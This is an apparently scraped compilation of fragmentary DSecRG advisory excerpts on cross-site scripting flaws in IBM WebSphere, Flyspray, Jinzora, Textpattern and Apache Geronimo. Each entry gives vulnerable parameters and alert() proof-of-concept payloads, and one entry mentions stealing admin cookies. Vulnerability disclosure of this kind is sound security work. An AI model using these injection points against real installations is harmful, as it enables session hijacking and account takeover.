[DSECRG-09-013] IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities

An attacker can inject XSS in the URL string.

Example:

http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp

Using this vulnerability, an attacker can steal the admin's cookie and then authenticate as the administrator.

2. PlantsByWebSphere Sample multiple XSS vulnerabilities.

[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities

POST parameters "tasks_perpage", "time_zone", "account_enabled", "notify_own".

Example:

tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src="javascript:alert('DSecRG XSS')">


1.2 Vulnerabilities found in script index.php?do=admin&area=newproject.


[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities

2. Linked XSS vulnerability found in /textpattern/setup/index.php. An attacker can inject XSS in the URL string.


Example:

http://[server]/[installdir]/textpattern/setup/index.php/"><script>alert('DSecRG XSS')</script>

--------------------------------------------------------------------------------------------


3. XSS in POST

[DSECRG-09-019] Apache Geronimo - XSS vulnerabilities.txt

An attacker can inject XSS in the URL string.

Example:

http://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--


2. Multiple stored XSS vulnerabilities found in script /console/portal/Server/Monitoring



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
